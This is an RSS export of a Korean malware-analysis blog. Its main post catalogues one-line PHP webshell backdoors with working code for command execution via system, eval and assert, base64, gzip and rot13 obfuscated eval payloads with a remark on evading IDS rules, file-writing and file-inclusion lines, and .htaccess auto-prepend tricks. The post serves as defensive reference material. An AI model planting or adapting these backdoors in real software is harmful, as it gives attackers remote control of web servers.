			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/151&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x02 analysis</category>
			<category>hash table collisions</category>
			<category>막 뻗어</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/151</guid>
			<comments>http://malwarelab.tistory.com/entry/PHP-Hash-Table-Collisions#entry151comment</comments>
			<pubDate>Wed, 04 Jan 2012 17:18:13 +0900</pubDate>
		</item>
		<item>
			<title>PHP 백도어(后门木马) 분석</title>
			<link>http://malwarelab.tistory.com/entry/PHP-%ED%9B%84%EB%AC%B8%EB%AA%A9%EB%A7%88-%EB%B6%84%EC%84%9D</link>
			<description>&lt;br /&gt;
&lt;br /&gt;한줄짜리 웹쉘인 일구화목마의 PHP 버전에 대한 내용입니다.&lt;br /&gt;
다양한 방법으로 일구화목마를 작성할 수 있다는걸 보여주기 위함으로 보입니다.&lt;br /&gt;
&lt;br /&gt;&lt;a title=&quot;[http://space.baidu.com/w5r2/blog/item/9871b21dfae3527ef724e425.html]로 이동합니다.&quot; target=&quot;_blank&quot; href=&quot;http://space.baidu.com/w5r2/blog/item/9871b21dfae3527ef724e425.html&quot;&gt;http://space.baidu.com/w5r2/blog/item/9871b21dfae3527ef724e425.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
어쨋든 이 일구화목마를 동작시키기 위해서 eval 함수를 써야 하는 경우도 있고&lt;br /&gt;
eval 함수 없이 일반적으로 쓰이는 함수나 - include나 require 같은 - 특정 변수를 사용하는 경우도 있습니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;PHP 백도어가 자주 사용하는 함수&lt;/span&gt;&lt;br /&gt;
1. 시스템 명령을 실행하는 함수 : system, passthru, shell_exec, exec, popen, proc_open&lt;br /&gt;
2. 코드 실행 및 암호화 : eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13&lt;br /&gt;
3. 파일 생성을 포함하는 함수 : require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite&lt;br /&gt;
4. .htaccess : SetHandler, auto_prepend_file, auto_append_file&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;1. 시스템 명령을 실행하는 함수&lt;/span&gt;&lt;br /&gt;
system 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?cmd=ls&lt;br /&gt;
&amp;nbsp; system($_GET[cmd]);&lt;br /&gt;
&lt;br /&gt;passthru 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?cmd=ls&lt;br /&gt;
&amp;nbsp; passthru($_GET[cmd]);&lt;br /&gt;
&lt;br /&gt;shell_exec 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?cmd=ls&lt;br /&gt;
&amp;nbsp; echo shell_exec($_GET[cmd]);&lt;br /&gt;
&lt;br /&gt;exec 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?cmd=ls&lt;br /&gt;
&amp;nbsp; $arr = array();&lt;br /&gt;
&amp;nbsp; exec($_GET[cmd],$arr);&lt;br /&gt;
&amp;nbsp; print_r($arr);&lt;br /&gt;
&lt;br /&gt;popen 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?cmd=ls&lt;br /&gt;
&amp;nbsp; $handle = popen('$_GET[cmd], 'r');&lt;br /&gt;
&amp;nbsp; $read = fread($handle, 2096);&lt;br /&gt;
&amp;nbsp; echo $read;&lt;br /&gt;
&amp;nbsp; pclose($handle);&lt;br /&gt;
&lt;br /&gt;proc_open 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?cmd=ls&lt;br /&gt;
&amp;nbsp; $descriptorspec = array(&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 0 =&amp;gt; array('pipe', 'r'),&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1 =&amp;gt; array('pipe', 'w'),&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2 =&amp;gt; array('pipe', 'w'),&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; );&lt;br /&gt;
&amp;nbsp; $proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);&lt;br /&gt;
&amp;nbsp; fclose($pipes[0]);&lt;br /&gt;
&amp;nbsp; $output = array();&lt;br /&gt;
&amp;nbsp; while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),&quot;\n&quot;));&lt;br /&gt;
&amp;nbsp; print_r($output);&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;2. 코드 실행 및 암호화&lt;/span&gt;&lt;br /&gt;
eval 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //가장 일반적인 일구화목마&lt;br /&gt;
&amp;nbsp; eval($_POST[cmd]);&lt;br /&gt;
&lt;br /&gt;base64_decode 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //Ciphertext: eval($_POST['cmd']);&lt;br /&gt;
&amp;nbsp; eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));&lt;br /&gt;
&lt;br /&gt;gzinflate 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //Ciphertext: eval($_POST['cmd']);&lt;br /&gt;
&amp;nbsp; eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));&lt;br /&gt;
&lt;br /&gt;gzuncompress 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //Ciphertext: eval($_POST['cmd']);&lt;br /&gt;
&amp;nbsp; eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));&lt;br /&gt;
&lt;br /&gt;gzdecode 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //Ciphertext: eval($_POST['cmd']);&lt;br /&gt;
&amp;nbsp; eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));&lt;br /&gt;
&lt;br /&gt;str_rot13 함수 --&amp;gt; eval 함수 없이 사용만 가능하다면 현재 IDS/IPS 룰에 의해 탐지되지 않을지도 모르겠습니다...&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //Ciphertext: eval($_POST[cmd]);&lt;br /&gt;
&amp;nbsp; eval(str_rot13('riny($_CBFG[pzq]);'));&lt;br /&gt;
&lt;br /&gt;assert 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //eval함수와 유사한&lt;br /&gt;
&amp;nbsp; assert($_POST[cmd]);&lt;br /&gt;
&lt;br /&gt;call_user_func 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; call_user_func('assert',$_POST[cmd]);&lt;br /&gt;
&lt;br /&gt;call_user_func 함수 &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?a=assert&amp;amp;cmd=phpinfo()&lt;br /&gt;
&amp;nbsp; call_user_func($_GET[a],$_REQUEST[cmd]);&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //test.php?a=assert&amp;amp;cmd=phpinfo()&lt;br /&gt;
&amp;nbsp; $_GET[a]($_REQUEST[cmd]);&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;3. 파일 생성을 포함하는 함수&lt;/span&gt;&lt;br /&gt;
require 함수&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //임의의 파일 포함&lt;br /&gt;
&amp;nbsp; //test.php?file=123.jpg&lt;br /&gt;
&amp;nbsp; require($_GET[file]);&lt;br /&gt;
&lt;br /&gt;require_once 함수&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //임의의 파일 포함&lt;br /&gt;
&amp;nbsp; //test.php?file=123.jpg&lt;br /&gt;
&amp;nbsp; require_once($_GET[file]);&lt;br /&gt;
&lt;br /&gt;include 함수&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //임의의 파일 포함&lt;br /&gt;
&amp;nbsp; //test.php?file=123.jpg&lt;br /&gt;
&amp;nbsp; include($_GET[file]);&lt;br /&gt;
&lt;br /&gt;include_once 함수&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //임의의 파일 포함&lt;br /&gt;
&amp;nbsp; //test.php?file=123.jpg&lt;br /&gt;
&amp;nbsp; include_once($_GET[file]);&lt;br /&gt;
&lt;br /&gt;file_get_contents 함수&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //임의의 파일 일기&lt;br /&gt;
&amp;nbsp; //test.php?f=config.inc.php&lt;br /&gt;
&amp;nbsp; echo file_get_contents($_GET['f']);&lt;br /&gt;
&lt;br /&gt;file_put_contents 함수&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //콘텐츠 파일 생성&lt;br /&gt;
&amp;nbsp; //a=test.php&amp;amp;b=&amp;lt;?php eval($_POST[cmd]);?&amp;gt;&lt;br /&gt;
&amp;nbsp; file_put_contents($_GET[a],$_GET[b]);&lt;br /&gt;
&lt;br /&gt;fputs 함수&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; //콘텐츠 파일 생성&lt;br /&gt;
&amp;nbsp; //a=test.php&amp;amp;b=&amp;lt;?php eval($_POST[cmd]);?&amp;gt;&lt;br /&gt;
&amp;nbsp; fputs(fopen($_GET[a],&quot;w&quot;),$_GET[b]);&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;4. .htaccess&lt;/span&gt;&lt;br /&gt;
SetHandler &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; // x.jpg에 PHP 코드를 삽입하고 .htaccess에 다음 내용을 추가하여 PHP 코드 사용&lt;br /&gt;
&amp;nbsp; // ....한다는 의미인 듯 합니다 -_-;;&lt;br /&gt;
&amp;nbsp; FilesMatch &quot;x.jpg&quot;&amp;gt;&lt;br /&gt;
&amp;nbsp; SetHandler application/x-httpd-php&lt;br /&gt;
&amp;nbsp; &amp;lt;/FilesMatch&amp;gt;&lt;br /&gt;
&lt;br /&gt;auto_prepend_file &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; // 모든 PHP 코드에 123.gif에 있는 코드 삽입&lt;br /&gt;
&amp;nbsp; // 파일의 경로는 절대경로로 작성&lt;br /&gt;
&amp;nbsp; php_value auto_prepend_file c:/apache2/htdocs/123.gif&lt;br /&gt;
&lt;br /&gt;auto_append_file &lt;br /&gt;
&lt;br /&gt;&amp;nbsp; // auto_prepend_file 비슷한 방법&lt;br /&gt;
php_value auto_append_file c:/apache2/htdocs/123.gif&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;일부 번역이 매끄럽지 못한 부분은 과감히 빼버렸고 -_-;;&lt;br /&gt;
제가 이해한대로 적었습니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-150-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-150-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-150-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/150&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>$_POST</category>
			<category>eval</category>
			<category>webshell</category>
			<category>별짓을다하는구나</category>
			<category>웹쉘</category>
			<category>일구화목마</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/150</guid>
			<comments>http://malwarelab.tistory.com/entry/PHP-%ED%9B%84%EB%AC%B8%EB%AA%A9%EB%A7%88-%EB%B6%84%EC%84%9D#entry150comment</comments>
			<pubDate>Mon, 21 Nov 2011 17:25:55 +0900</pubDate>
		</item>
		<item>
			<title>ionCube PHP Encoder</title>
			<link>http://malwarelab.tistory.com/entry/ionCube-PHP-Encoder</link>
			<description>&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img style=&quot;clear: none; float: none;&quot; src=&quot;data:image/png;base64,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